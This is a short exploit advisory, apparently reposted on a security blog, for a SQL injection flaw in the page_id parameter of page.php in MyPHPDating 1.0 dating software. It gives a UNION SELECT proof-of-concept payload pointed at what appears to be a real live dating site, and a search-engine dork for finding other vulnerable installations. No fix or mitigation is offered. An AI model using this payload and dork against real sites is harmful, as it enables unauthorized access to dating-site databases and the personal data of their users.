MyPHPDating 1.0 SQL Injection Vuln


[o] MyPHPDating 1.0 SQL Injection Vulnerability
Software : MyPHPDating version 1.0
Vendor   : http://www.phponlinedatingsoftware.com/
Demo     : http://www.phponlinedatingsoftware.com/demo.htm
Author   : NoGe


[o] Description
MyPHPDating 1.0 is a full-featured version of our online dating / Matchmaking software.
It combines all the features of any standard online dating / Matchmaking website plus much more features,
that make your dating website very powerful and easy to use.


[o] Vulnerable file
page.php


[o] Exploit
http://localhost/[path]/page.php?page_id=[SQL]


[o] Proof Of Concept
http://thaigirllover.com/page.php?page_id=-1+union+select+1,2,3,concat(@@version,0x3c3e,database())--


[o] Dork
"Powered by MyPHPDating"

Research Blog

Search This Blog

LFI to RCE via access_log injection

MyPHPDating 1.0 SQL Injection Vuln

Comments